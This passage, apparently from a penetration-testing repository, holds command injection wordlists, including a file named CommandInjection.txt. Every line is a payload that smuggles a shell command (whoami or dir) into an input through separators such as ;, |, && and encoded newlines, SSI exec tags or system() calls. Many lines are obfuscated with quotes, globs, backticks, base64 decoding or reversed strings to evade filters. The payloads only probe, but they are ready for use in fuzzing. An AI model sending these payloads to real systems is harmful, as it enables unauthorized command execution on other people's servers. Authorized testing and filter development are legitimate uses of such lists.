231 | ;system('wh'oa'mi')
232 | $(wh'oa'mi)
233 | who??i
234 | ;who??i
235 | ;who??i;
236 | ^who??i
237 | |who??i
238 | <who??i
239 | <who??i;
240 | <who??i\n
241 | <who??i%0D
242 | <who??i%0A
243 | &who??i
244 | &who??i&
245 | &&who??i
246 | &&who??i&&
247 | %0Dwho??i
248 | %0Dwho??i%0D
249 | %0Awho??i
250 | %0Awho??i%0A
251 | \nwho??i
252 | \nwho??i\n
253 | 'who??i'
254 | `who??i`
255 | ;who??i|
256 | ;who??i/n
257 | |who??i;
258 | a);who??i
259 | a;who??i
260 | a);who??i
261 | a;who??i;
262 | a);who??i|
263 | FAIL||who??i
264 | CMD=$'who??i';$CMD
265 | ;CMD=$'who??i';$CMD
266 | ^CMD=$'who??i';$CMD
267 | |CMD=$'who??i';$CMD
268 | &CMD=$'who??i';$CMD
269 | &&CMD=$'who??i';$CMD
270 | %0DCMD=$'who??i';$CMD
271 | FAIL||CMD=$'who??i';$CMD
272 | CMD=$\'who??i\';$CMD
273 | ;CMD=$\'who??i\';$CMD
274 | ^CMD=$\'who??i\';$CMD
275 | |CMD=$\'who??i\';$CMD
276 | &CMD=$\'who??i\';$CMD
277 | &&CMD=$\'who??i\';$CMD
278 | %0DCMD=$\'who??i\';$CMD
279 | FAIL||CMD=$\'who??i\';$CMD
280 | CMD=$"who??i";$CMD
281 | ;CMD=$"who??i";$CMD
282 | ^CMD=$"who??i";$CMD
283 | |CMD=$"who??i";$CMD
284 | &CMD=$"who??i";$CMD
285 | &&CMD=$"who??i";$CMD
286 | %0DCMD=$"who??i";$CMD
287 | FAIL||CMD=$"who??i";$CMD
288 | <!--#exec cmd="who??i"-->
289 | ;system('who??i')
290 | $(who??i)
291 | wh*ami
292 | ;wh*ami
293 | ;wh*ami;
294 | ^wh*ami
295 | |wh*ami
296 | <wh*ami
297 | <wh*ami;
298 | <wh*ami\n
299 | <wh*ami%0D
300 | <wh*ami%0A
301 | &wh*ami
302 | &wh*ami&
303 | &&wh*ami
304 | &&wh*ami&&
305 | %0Dwh*ami
306 | %0Dwh*ami%0D
307 | %0Awh*ami
308 | %0Awh*ami%0A
309 | \nwh*ami
310 | \nwh*ami\n
311 | 'wh*ami'
312 | `wh*ami`
313 | ;wh*ami|
314 | ;wh*ami/n
315 | |wh*ami;
316 | a);wh*ami
317 | a;wh*ami
318 | a);wh*ami
319 | a;wh*ami;
320 | a);wh*ami|
321 | FAIL||wh*ami
322 | CMD=$'wh*ami';$CMD
323 | ;CMD=$'wh*ami';$CMD
324 | ^CMD=$'wh*ami';$CMD
325 | |CMD=$'wh*ami';$CMD
326 | &CMD=$'wh*ami';$CMD
327 | &&CMD=$'wh*ami';$CMD
328 | %0DCMD=$'wh*ami';$CMD
329 | FAIL||CMD=$'wh*ami';$CMD
330 | CMD=$\'wh*ami\';$CMD
331 | ;CMD=$\'wh*ami\';$CMD
332 | ^CMD=$\'wh*ami\';$CMD
333 | |CMD=$\'wh*ami\';$CMD
334 | &CMD=$\'wh*ami\';$CMD
335 | &&CMD=$\'wh*ami\';$CMD
336 | %0DCMD=$\'wh*ami\';$CMD
337 | FAIL||CMD=$\'wh*ami\';$CMD
338 | CMD=$"wh*ami";$CMD
339 | ;CMD=$"wh*ami";$CMD
340 | ^CMD=$"wh*ami";$CMD
341 | |CMD=$"wh*ami";$CMD
342 | &CMD=$"wh*ami";$CMD
343 | &&CMD=$"wh*ami";$CMD
344 | %0DCMD=$"wh*ami";$CMD
345 | FAIL||CMD=$"wh*ami";$CMD
346 | <!--#exec cmd="wh*ami"-->
347 | ;system('wh*ami')
348 | $(wh*ami)
349 | wh``ami
350 | ;wh``ami
351 | ;wh``ami;
352 | ^wh``ami
353 | |wh``ami
354 | <wh``ami
355 | <wh``ami;
356 | <wh``ami\n
357 | <wh``ami%0D
358 | <wh``ami%0A
359 | &wh``ami
360 | &wh``ami&
361 | &&wh``ami
362 | &&wh``ami&&
363 | %0Dwh``ami
364 | %0Dwh``ami%0D
365 | %0Awh``ami
366 | %0Awh``ami%0A
367 | \nwh``ami
368 | \nwh``ami\n
369 | 'wh``ami'
370 | `wh``ami`
371 | ;wh``ami|
372 | ;wh``ami/n
373 | |wh``ami;
374 | a);wh``ami
375 | a;wh``ami
376 | a);wh``ami
377 | a;wh``ami;
378 | a);wh``ami|
379 | FAIL||wh``ami
380 | CMD=$'wh``ami';$CMD
381 | ;CMD=$'wh``ami';$CMD
382 | ^CMD=$'wh``ami';$CMD
383 | |CMD=$'wh``ami';$CMD
384 | &CMD=$'wh``ami';$CMD
385 | &&CMD=$'wh``ami';$CMD
386 | %0DCMD=$'wh``ami';$CMD
387 | FAIL||CMD=$'wh``ami';$CMD
388 | CMD=$\'wh``ami\';$CMD
389 | ;CMD=$\'wh``ami\';$CMD
390 | ^CMD=$\'wh``ami\';$CMD
391 | |CMD=$\'wh``ami\';$CMD
392 | &CMD=$\'wh``ami\';$CMD
393 | &&CMD=$\'wh``ami\';$CMD
394 | %0DCMD=$\'wh``ami\';$CMD
395 | FAIL||CMD=$\'wh``ami\';$CMD
396 | CMD=$"wh``ami";$CMD
397 | ;CMD=$"wh``ami";$CMD
398 | ^CMD=$"wh``ami";$CMD
399 | |CMD=$"wh``ami";$CMD
400 | &CMD=$"wh``ami";$CMD
401 | &&CMD=$"wh``ami";$CMD
402 | %0DCMD=$"wh``ami";$CMD
403 | FAIL||CMD=$"wh``ami";$CMD
404 | <!--#exec cmd="wh``ami"-->
405 | ;system('wh``ami')
406 | $(wh``ami)
407 | who``ami
408 | ;who``ami
409 | ;who``ami;
410 | ^who``ami
411 | |who``ami
412 | <who``ami
413 | <who``ami;
414 | <who``ami\n
415 | <who``ami%0D
416 | <who``ami%0A
417 | &who``ami
418 | &who``ami&
419 | &&who``ami
420 | &&who``ami&&
421 | %0Dwho``ami
422 | %0Dwho``ami%0D
423 | %0Awho``ami
424 | %0Awho``ami%0A
425 | \nwho``ami
426 | \nwho``ami\n
427 | 'who``ami'
428 | `who``ami`
429 | ;who``ami|
430 | ;who``ami/n
431 | |who``ami;
432 | a);who``ami
433 | a;who``ami
434 | a);who``ami
435 | a;who``ami;
436 | a);who``ami|
437 | FAIL||who``ami
438 | CMD=$'who``ami';$CMD
439 | ;CMD=$'who``ami';$CMD
440 | ^CMD=$'who``ami';$CMD
441 | |CMD=$'who``ami';$CMD
442 | &CMD=$'who``ami';$CMD
443 | &&CMD=$'who``ami';$CMD
444 | %0DCMD=$'who``ami';$CMD
445 | FAIL||CMD=$'who``ami';$CMD
446 | CMD=$\'who``ami\';$CMD
447 | ;CMD=$\'who``ami\';$CMD
448 | ^CMD=$\'who``ami\';$CMD
449 | |CMD=$\'who``ami\';$CMD
450 | &CMD=$\'who``ami\';$CMD
451 | &&CMD=$\'who``ami\';$CMD
452 | %0DCMD=$\'who``ami\';$CMD
453 | FAIL||CMD=$\'who``ami\';$CMD
454 | CMD=$"who``ami";$CMD
455 | ;CMD=$"who``ami";$CMD
456 | ^CMD=$"who``ami";$CMD
457 | |CMD=$"who``ami";$CMD
458 | &CMD=$"who``ami";$CMD
459 | &&CMD=$"who``ami";$CMD
460 | %0DCMD=$"who``ami";$CMD
461 | FAIL||CMD=$"who``ami";$CMD
462 | <!--#exec cmd="who``ami"-->
463 | ;system('who``ami')
464 | $(who``ami)
465 | who$()ami
466 | ;who$()ami
467 | ;who$()ami;
468 | ^who$()ami
469 | |who$()ami
470 | <who$()ami
471 | <who$()ami;
472 | <who$()ami\n
473 | <who$()ami%0D
474 | <who$()ami%0A
475 | &who$()ami
476 | &who$()ami&
477 | &&who$()ami
478 | &&who$()ami&&
479 | %0Dwho$()ami
480 | %0Dwho$()ami%0D
481 | %0Awho$()ami
482 | %0Awho$()ami%0A
483 | \nwho$()ami
484 | \nwho$()ami\n
485 | 'who$()ami'
486 | `who$()ami`
487 | ;who$()ami|
488 | ;who$()ami/n
489 | |who$()ami;
490 | a);who$()ami
491 | a;who$()ami
492 | a);who$()ami
493 | a;who$()ami;
494 | a);who$()ami|
495 | FAIL||who$()ami
496 | CMD=$'who$()ami';$CMD
497 | ;CMD=$'who$()ami';$CMD
498 | ^CMD=$'who$()ami';$CMD
499 | |CMD=$'who$()ami';$CMD
500 | &CMD=$'who$()ami';$CMD
501 | &&CMD=$'who$()ami';$CMD
502 | %0DCMD=$'who$()ami';$CMD
503 | FAIL||CMD=$'who$()ami';$CMD
504 | CMD=$\'who$()ami\';$CMD
505 | ;CMD=$\'who$()ami\';$CMD
506 | ^CMD=$\'who$()ami\';$CMD
507 | |CMD=$\'who$()ami\';$CMD
508 | &CMD=$\'who$()ami\';$CMD
509 | &&CMD=$\'who$()ami\';$CMD
510 | %0DCMD=$\'who$()ami\';$CMD
511 | FAIL||CMD=$\'who$()ami\';$CMD
512 | CMD=$"who$()ami";$CMD
513 | ;CMD=$"who$()ami";$CMD
514 | ^CMD=$"who$()ami";$CMD
515 | |CMD=$"who$()ami";$CMD
516 | &CMD=$"who$()ami";$CMD
517 | &&CMD=$"who$()ami";$CMD
518 | %0DCMD=$"who$()ami";$CMD
519 | FAIL||CMD=$"who$()ami";$CMD
520 | <!--#exec cmd="who$()ami"-->
521 | ;system('who$()ami')
522 | $(who$()ami)
523 | who{neko}ami
524 | ;who{neko}ami
525 | ;who{neko}ami;
526 | ^who{neko}ami
527 | |who{neko}ami
528 | <who{neko}ami
529 | <who{neko}ami;
530 | <who{neko}ami\n
531 | <who{neko}ami%0D
532 | <who{neko}ami%0A
533 | &who{neko}ami
534 | &who{neko}ami&
535 | &&who{neko}ami
536 | &&who{neko}ami&&
537 | %0Dwho{neko}ami
538 | %0Dwho{neko}ami%0D
539 | %0Awho{neko}ami
540 | %0Awho{neko}ami%0A
541 | \nwho{neko}ami
542 | \nwho{neko}ami\n
543 | 'who{neko}ami'
544 | `who{neko}ami`
545 | ;who{neko}ami|
546 | ;who{neko}ami/n
547 | |who{neko}ami;
548 | a);who{neko}ami
549 | a;who{neko}ami
550 | a);who{neko}ami
551 | a;who{neko}ami;
552 | a);who{neko}ami|
553 | FAIL||who{neko}ami
554 | CMD=$'who{neko}ami';$CMD
555 | ;CMD=$'who{neko}ami';$CMD
556 | ^CMD=$'who{neko}ami';$CMD
557 | |CMD=$'who{neko}ami';$CMD
558 | &CMD=$'who{neko}ami';$CMD
559 | &&CMD=$'who{neko}ami';$CMD
560 | %0DCMD=$'who{neko}ami';$CMD
561 | FAIL||CMD=$'who{neko}ami';$CMD
562 | CMD=$\'who{neko}ami\';$CMD
563 | ;CMD=$\'who{neko}ami\';$CMD
564 | ^CMD=$\'who{neko}ami\';$CMD
565 | |CMD=$\'who{neko}ami\';$CMD
566 | &CMD=$\'who{neko}ami\';$CMD
567 | &&CMD=$\'who{neko}ami\';$CMD
568 | %0DCMD=$\'who{neko}ami\';$CMD
569 | FAIL||CMD=$\'who{neko}ami\';$CMD
570 | CMD=$"who{neko}ami";$CMD
571 | ;CMD=$"who{neko}ami";$CMD
572 | ^CMD=$"who{neko}ami";$CMD
573 | |CMD=$"who{neko}ami";$CMD
574 | &CMD=$"who{neko}ami";$CMD
575 | &&CMD=$"who{neko}ami";$CMD
576 | %0DCMD=$"who{neko}ami";$CMD
577 | FAIL||CMD=$"who{neko}ami";$CMD
578 | <!--#exec cmd="who{neko}ami"-->
579 | ;system('who{neko}ami')
580 | $(who{neko}ami)
581 | `echo "imaohw" | rev`
582 | ;`echo "imaohw" | rev`
583 | ;`echo "imaohw" | rev`;
584 | ^`echo "imaohw" | rev`
585 | |`echo "imaohw" | rev`
586 | <`echo "imaohw" | rev`
587 | <`echo "imaohw" | rev`;
588 | <`echo "imaohw" | rev`\n
589 | <`echo "imaohw" | rev`%0D
590 | <`echo "imaohw" | rev`%0A
591 | &`echo "imaohw" | rev`
592 | &`echo "imaohw" | rev`&
593 | &&`echo "imaohw" | rev`
594 | &&`echo "imaohw" | rev`&&
595 | %0D`echo "imaohw" | rev`
596 | %0D`echo "imaohw" | rev`%0D
597 | %0A`echo "imaohw" | rev`
598 | %0A`echo "imaohw" | rev`%0A
599 | \n`echo "imaohw" | rev`
600 | \n`echo "imaohw" | rev`\n
601 | '`echo "imaohw" | rev`'
602 | ``echo "imaohw" | rev``
603 | ;`echo "imaohw" | rev`|
604 | ;`echo "imaohw" | rev`/n
605 | |`echo "imaohw" | rev`;
606 | a);`echo "imaohw" | rev`
607 | a;`echo "imaohw" | rev`
608 | a);`echo "imaohw" | rev`
609 | a;`echo "imaohw" | rev`;
610 | a);`echo "imaohw" | rev`|
611 | FAIL||`echo "imaohw" | rev`
612 | CMD=$'`echo "imaohw" | rev`';$CMD
613 | ;CMD=$'`echo "imaohw" | rev`';$CMD
614 | ^CMD=$'`echo "imaohw" | rev`';$CMD
615 | |CMD=$'`echo "imaohw" | rev`';$CMD
616 | &CMD=$'`echo "imaohw" | rev`';$CMD
617 | &&CMD=$'`echo "imaohw" | rev`';$CMD
618 | %0DCMD=$'`echo "imaohw" | rev`';$CMD
619 | FAIL||CMD=$'`echo "imaohw" | rev`';$CMD
620 | CMD=$\'`echo "imaohw" | rev`\';$CMD
621 | ;CMD=$\'`echo "imaohw" | rev`\';$CMD
622 | ^CMD=$\'`echo "imaohw" | rev`\';$CMD
623 | |CMD=$\'`echo "imaohw" | rev`\';$CMD
624 | &CMD=$\'`echo "imaohw" | rev`\';$CMD
625 | &&CMD=$\'`echo "imaohw" | rev`\';$CMD
626 | %0DCMD=$\'`echo "imaohw" | rev`\';$CMD
627 | FAIL||CMD=$\'`echo "imaohw" | rev`\';$CMD
628 | CMD=$"`echo "imaohw" | rev`";$CMD
629 | ;CMD=$"`echo "imaohw" | rev`";$CMD
630 | ^CMD=$"`echo "imaohw" | rev`";$CMD
631 | |CMD=$"`echo "imaohw" | rev`";$CMD
632 | &CMD=$"`echo "imaohw" | rev`";$CMD
633 | &&CMD=$"`echo "imaohw" | rev`";$CMD
634 | %0DCMD=$"`echo "imaohw" | rev`";$CMD
635 | FAIL||CMD=$"`echo "imaohw" | rev`";$CMD
636 | <!--#exec cmd="`echo "imaohw" | rev`"-->
637 | ;system('`echo "imaohw" | rev`')
638 | $(`echo "imaohw" | rev`)
639 | $(echo d2hvYW1pCg== | base64 -d)
640 | ;$(echo d2hvYW1pCg== | base64 -d)
641 | ;$(echo d2hvYW1pCg== | base64 -d);
642 | ^$(echo d2hvYW1pCg== | base64 -d)
643 | |$(echo d2hvYW1pCg== | base64 -d)
644 | <$(echo d2hvYW1pCg== | base64 -d)
645 | <$(echo d2hvYW1pCg== | base64 -d);
646 | <$(echo d2hvYW1pCg== | base64 -d)\n
647 | <$(echo d2hvYW1pCg== | base64 -d)%0D
648 | <$(echo d2hvYW1pCg== | base64 -d)%0A
649 | &$(echo d2hvYW1pCg== | base64 -d)
650 | &$(echo d2hvYW1pCg== | base64 -d)&
651 | &&$(echo d2hvYW1pCg== | base64 -d)
652 | &&$(echo d2hvYW1pCg== | base64 -d)&&
653 | %0D$(echo d2hvYW1pCg== | base64 -d)
654 | %0D$(echo d2hvYW1pCg== | base64 -d)%0D
655 | %0A$(echo d2hvYW1pCg== | base64 -d)
656 | %0A$(echo d2hvYW1pCg== | base64 -d)%0A
657 | \n$(echo d2hvYW1pCg== | base64 -d)
658 | \n$(echo d2hvYW1pCg== | base64 -d)\n
659 | '$(echo d2hvYW1pCg== | base64 -d)'
660 | `$(echo d2hvYW1pCg== | base64 -d)`
661 | ;$(echo d2hvYW1pCg== | base64 -d)|
662 | ;$(echo d2hvYW1pCg== | base64 -d)/n
663 | |$(echo d2hvYW1pCg== | base64 -d);
664 | a);$(echo d2hvYW1pCg== | base64 -d)
665 | a;$(echo d2hvYW1pCg== | base64 -d)
666 | a);$(echo d2hvYW1pCg== | base64 -d)
667 | a;$(echo d2hvYW1pCg== | base64 -d);
668 | a);$(echo d2hvYW1pCg== | base64 -d)|
669 | FAIL||$(echo d2hvYW1pCg== | base64 -d)
670 | CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
671 | ;CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
672 | ^CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
673 | |CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
674 | &CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
675 | &&CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
676 | %0DCMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
677 | FAIL||CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
678 | CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
679 | ;CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
680 | ^CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
681 | |CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
682 | &CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
683 | &&CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
684 | %0DCMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
685 | FAIL||CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
686 | CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
687 | ;CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
688 | ^CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
689 | |CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
690 | &CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
691 | &&CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
692 | %0DCMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
693 | FAIL||CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
694 | <!--#exec cmd="$(echo d2hvYW1pCg== | base64 -d)"-->
695 | ;system('$(echo d2hvYW1pCg== | base64 -d)')
696 | $($(echo d2hvYW1pCg== | base64 -d))
697 | w\ho\\mi
698 | ;w\ho\\mi
699 | ;w\ho\\mi;
700 | ^w\ho\\mi
701 | |w\ho\\mi
702 | <w\ho\\mi
703 | <w\ho\\mi;
704 | <w\ho\\mi\n
705 | <w\ho\\mi%0D
706 | <w\ho\\mi%0A
707 | &w\ho\\mi
708 | &w\ho\\mi&
709 | &&w\ho\\mi
710 | &&w\ho\\mi&&
711 | %0Dw\ho\\mi
712 | %0Dw\ho\\mi%0D
713 | %0Aw\ho\\mi
714 | %0Aw\ho\\mi%0A
715 | \nw\ho\\mi
716 | \nw\ho\\mi\n
717 | 'w\ho\\mi'
718 | `w\ho\\mi`
719 | ;w\ho\\mi|
720 | ;w\ho\\mi/n
721 | |w\ho\\mi;
722 | a);w\ho\\mi
723 | a;w\ho\\mi
724 | a);w\ho\\mi
725 | a;w\ho\\mi;
726 | a);w\ho\\mi|
727 | FAIL||w\ho\\mi
728 | CMD=$'w\ho\\mi';$CMD
729 | ;CMD=$'w\ho\\mi';$CMD
730 | ^CMD=$'w\ho\\mi';$CMD
731 | |CMD=$'w\ho\\mi';$CMD
732 | &CMD=$'w\ho\\mi';$CMD
733 | &&CMD=$'w\ho\\mi';$CMD
734 | %0DCMD=$'w\ho\\mi';$CMD
735 | FAIL||CMD=$'w\ho\\mi';$CMD
736 | CMD=$\'w\ho\\mi\';$CMD
737 | ;CMD=$\'w\ho\\mi\';$CMD
738 | ^CMD=$\'w\ho\\mi\';$CMD
739 | |CMD=$\'w\ho\\mi\';$CMD
740 | &CMD=$\'w\ho\\mi\';$CMD
741 | &&CMD=$\'w\ho\\mi\';$CMD
742 | %0DCMD=$\'w\ho\\mi\';$CMD
743 | FAIL||CMD=$\'w\ho\\mi\';$CMD
744 | CMD=$"w\ho\\mi";$CMD
745 | ;CMD=$"w\ho\\mi";$CMD
746 | ^CMD=$"w\ho\\mi";$CMD
747 | |CMD=$"w\ho\\mi";$CMD
748 | &CMD=$"w\ho\\mi";$CMD
749 | &&CMD=$"w\ho\\mi";$CMD
750 | %0DCMD=$"w\ho\\mi";$CMD
751 | FAIL||CMD=$"w\ho\\mi";$CMD
752 | <!--#exec cmd="w\ho\\mi"-->
753 | ;system('w\ho\\mi')
754 | $(w\ho\\mi)
755 | wh$@ami
756 | ;wh$@ami
757 | ;wh$@ami;
758 | ^wh$@ami
759 | |wh$@ami
760 | <wh$@ami
761 | <wh$@ami;
762 | <wh$@ami\n
763 | <wh$@ami%0D
764 | <wh$@ami%0A
765 | &wh$@ami
766 | &wh$@ami&
767 | &&wh$@ami
768 | &&wh$@ami&&
769 | %0Dwh$@ami
770 | %0Dwh$@ami%0D
771 | %0Awh$@ami
772 | %0Awh$@ami%0A
773 | \nwh$@ami
774 | \nwh$@ami\n
775 | 'wh$@ami'
776 | `wh$@ami`
777 | ;wh$@ami|
778 | ;wh$@ami/n
779 | |wh$@ami;
780 | a);wh$@ami
781 | a;wh$@ami
782 | a);wh$@ami
783 | a;wh$@ami;
784 | a);wh$@ami|
785 | FAIL||wh$@ami
786 | CMD=$'wh$@ami';$CMD
787 | ;CMD=$'wh$@ami';$CMD
788 | ^CMD=$'wh$@ami';$CMD
789 | |CMD=$'wh$@ami';$CMD
790 | &CMD=$'wh$@ami';$CMD
791 | &&CMD=$'wh$@ami';$CMD
792 | %0DCMD=$'wh$@ami';$CMD
793 | FAIL||CMD=$'wh$@ami';$CMD
794 | CMD=$\'wh$@ami\';$CMD
795 | ;CMD=$\'wh$@ami\';$CMD
796 | ^CMD=$\'wh$@ami\';$CMD
797 | |CMD=$\'wh$@ami\';$CMD
798 | &CMD=$\'wh$@ami\';$CMD
799 | &&CMD=$\'wh$@ami\';$CMD
800 | %0DCMD=$\'wh$@ami\';$CMD
801 | FAIL||CMD=$\'wh$@ami\';$CMD
802 | CMD=$"wh$@ami";$CMD
803 | ;CMD=$"wh$@ami";$CMD
804 | ^CMD=$"wh$@ami";$CMD
805 | |CMD=$"wh$@ami";$CMD
806 | &CMD=$"wh$@ami";$CMD
807 | &&CMD=$"wh$@ami";$CMD
808 | %0DCMD=$"wh$@ami";$CMD
809 | FAIL||CMD=$"wh$@ami";$CMD
810 | <!--#exec cmd="wh$@ami"-->
811 | ;system('wh$@ami')
812 | $(wh$@ami)
813 | echo whoami|$0
814 | ;echo whoami|$0
815 | ;echo whoami|$0;
816 | ^echo whoami|$0
817 | |echo whoami|$0
818 | <echo whoami|$0
819 | <echo whoami|$0;
820 | <echo whoami|$0\n
821 | <echo whoami|$0%0D
822 | <echo whoami|$0%0A
823 | &echo whoami|$0
824 | &echo whoami|$0&
825 | &&echo whoami|$0
826 | &&echo whoami|$0&&
827 | %0Decho whoami|$0
828 | %0Decho whoami|$0%0D
829 | %0Aecho whoami|$0
830 | %0Aecho whoami|$0%0A
831 | \necho whoami|$0
832 | \necho whoami|$0\n
833 | 'echo whoami|$0'
834 | `echo whoami|$0`
835 | ;echo whoami|$0|
836 | ;echo whoami|$0/n
837 | |echo whoami|$0;
838 | a);echo whoami|$0
839 | a;echo whoami|$0
840 | a);echo whoami|$0
841 | a;echo whoami|$0;
842 | a);echo whoami|$0|
843 | FAIL||echo whoami|$0
844 | CMD=$'echo whoami|$0';$CMD
845 | ;CMD=$'echo whoami|$0';$CMD
846 | ^CMD=$'echo whoami|$0';$CMD
847 | |CMD=$'echo whoami|$0';$CMD
848 | &CMD=$'echo whoami|$0';$CMD
849 | &&CMD=$'echo whoami|$0';$CMD
850 | %0DCMD=$'echo whoami|$0';$CMD
851 | FAIL||CMD=$'echo whoami|$0';$CMD
852 | CMD=$\'echo whoami|$0\';$CMD
853 | ;CMD=$\'echo whoami|$0\';$CMD
854 | ^CMD=$\'echo whoami|$0\';$CMD
855 | |CMD=$\'echo whoami|$0\';$CMD
856 | &CMD=$\'echo whoami|$0\';$CMD
857 | &&CMD=$\'echo whoami|$0\';$CMD
858 | %0DCMD=$\'echo whoami|$0\';$CMD
859 | FAIL||CMD=$\'echo whoami|$0\';$CMD
860 | CMD=$"echo whoami|$0";$CMD
861 | ;CMD=$"echo whoami|$0";$CMD
862 | ^CMD=$"echo whoami|$0";$CMD
863 | |CMD=$"echo whoami|$0";$CMD
864 | &CMD=$"echo whoami|$0";$CMD
865 | &&CMD=$"echo whoami|$0";$CMD
866 | %0DCMD=$"echo whoami|$0";$CMD
867 | FAIL||CMD=$"echo whoami|$0";$CMD
868 | <!--#exec cmd="echo whoami|$0"-->
869 | ;system('echo whoami|$0')
870 | $(echo whoami|$0)
871 | whoami
872 | 


--------------------------------------------------------------------------------
/Attacks/Command-Injection/CommandInjection.txt:
--------------------------------------------------------------------------------
  1 | dir
  2 | ;dir
  3 | ;dir;
  4 | ^dir
  5 | |dir
  6 | <dir
  7 | <dir;
  8 | <dir\n
  9 | <dir%0D
 10 | <dir%0A
 11 | &dir
 12 | &dir&
 13 | &&dir
 14 | &&dir&&
 15 | %0Ddir
 16 | %0Ddir%0D
 17 | %0Adir
 18 | %0Adir%0A
 19 | \ndir
 20 | \ndir\n
 21 | 'dir'
 22 | `dir`
 23 | ;dir|
 24 | ;dir/n
 25 | |dir;
 26 | a);dir
 27 | a;dir
 28 | a);dir
 29 | a;dir;
 30 | a);dir|
 31 | FAIL||dir
 32 | CMD=$'dir';$CMD
 33 | ;CMD=$'dir';$CMD
 34 | ^CMD=$'dir';$CMD
 35 | |CMD=$'dir';$CMD
 36 | &CMD=$'dir';$CMD
 37 | &&CMD=$'dir';$CMD
 38 | %0DCMD=$'dir';$CMD
 39 | FAIL||CMD=$'dir';$CMD
 40 | CMD=$\'dir\';$CMD
 41 | ;CMD=$\'dir\';$CMD
 42 | ^CMD=$\'dir\';$CMD
 43 | |CMD=$\'dir\';$CMD
 44 | &CMD=$\'dir\';$CMD
 45 | &&CMD=$\'dir\';$CMD
 46 | %0DCMD=$\'dir\';$CMD
 47 | FAIL||CMD=$\'dir\';$CMD
 48 | CMD=$"dir";$CMD
 49 | ;CMD=$"dir";$CMD
 50 | ^CMD=$"dir";$CMD
 51 | |CMD=$"dir";$CMD
 52 | &CMD=$"dir";$CMD
 53 | &&CMD=$"dir";$CMD
 54 | %0DCMD=$"dir";$CMD
 55 | FAIL||CMD=$"dir";$CMD
 56 | <!--#exec cmd="dir"-->
 57 | ;system('dir')
 58 | $(dir)
 59 | whoami
 60 | ;whoami
 61 | ;whoami;
 62 | ^whoami
 63 | |whoami
 64 | <whoami
 65 | <whoami;
 66 | <whoami\n
 67 | <whoami%0D
 68 | <whoami%0A
 69 | &whoami
 70 | &whoami&
 71 | &&whoami
 72 | &&whoami&&
 73 | %0Dwhoami
 74 | %0Dwhoami%0D
 75 | %0Awhoami
 76 | %0Awhoami%0A
 77 | \nwhoami
 78 | \nwhoami\n
 79 | 'whoami'
 80 | `whoami`
 81 | ;whoami|
 82 | ;whoami/n
 83 | |whoami;
 84 | a);whoami
 85 | a;whoami
 86 | a);whoami
 87 | a;whoami;
 88 | a);whoami|
 89 | FAIL||whoami
 90 | CMD=$'whoami';$CMD
 91 | ;CMD=$'whoami';$CMD
 92 | ^CMD=$'whoami';$CMD
 93 | |CMD=$'whoami';$CMD
 94 | &CMD=$'whoami';$CMD
 95 | &&CMD=$'whoami';$CMD
 96 | %0DCMD=$'whoami';$CMD
 97 | FAIL||CMD=$'whoami';$CMD
 98 | CMD=$\'whoami\';$CMD
 99 | ;CMD=$\'whoami\';$CMD
100 | ^CMD=$\'whoami\';$CMD
101 | |CMD=$\'whoami\';$CMD
102 | &CMD=$\'whoami\';$CMD
103 | &&CMD=$\'whoami\';$CMD
104 | %0DCMD=$\'whoami\';$CMD
105 | FAIL||CMD=$\'whoami\';$CMD
106 | CMD=$"whoami";$CMD
107 | ;CMD=$"whoami";$CMD
108 | ^CMD=$"whoami";$CMD
109 | |CMD=$"whoami";$CMD
110 | &CMD=$"whoami";$CMD
111 | &&CMD=$"whoami";$CMD
112 | %0DCMD=$"whoami";$CMD
113 | FAIL||CMD=$"whoami";$CMD
114 | <!--#exec cmd="whoami"-->
115 | ;system('whoami')
116 | $(whoami)
117 | wh"o"ami
118 | ;wh"o"ami
119 | ;wh"o"ami;
120 | ^wh"o"ami
121 | |wh"o"ami
122 | <wh"o"ami
123 | <wh"o"ami;
124 | <wh"o"ami\n
125 | <wh"o"ami%0D
126 | <wh"o"ami%0A
127 | &wh"o"ami
128 | &wh"o"ami&
129 | &&wh"o"ami
130 | &&wh"o"ami&&
131 | %0Dwh"o"ami
132 | %0Dwh"o"ami%0D
133 | %0Awh"o"ami
134 | %0Awh"o"ami%0A
135 | \nwh"o"ami
136 | \nwh"o"ami\n
137 | 'wh"o"ami'
138 | `wh"o"ami`
139 | ;wh"o"ami|
140 | ;wh"o"ami/n
141 | |wh"o"ami;
142 | a);wh"o"ami
143 | a;wh"o"ami
144 | a);wh"o"ami
145 | a;wh"o"ami;
146 | a);wh"o"ami|
147 | FAIL||wh"o"ami
148 | CMD=$'wh"o"ami';$CMD
149 | ;CMD=$'wh"o"ami';$CMD
150 | ^CMD=$'wh"o"ami';$CMD
151 | |CMD=$'wh"o"ami';$CMD
152 | &CMD=$'wh"o"ami';$CMD
153 | &&CMD=$'wh"o"ami';$CMD
154 | %0DCMD=$'wh"o"ami';$CMD
155 | FAIL||CMD=$'wh"o"ami';$CMD
156 | CMD=$\'wh"o"ami\';$CMD
157 | ;CMD=$\'wh"o"ami\';$CMD
158 | ^CMD=$\'wh"o"ami\';$CMD
159 | |CMD=$\'wh"o"ami\';$CMD
160 | &CMD=$\'wh"o"ami\';$CMD
161 | &&CMD=$\'wh"o"ami\';$CMD
162 | %0DCMD=$\'wh"o"ami\';$CMD
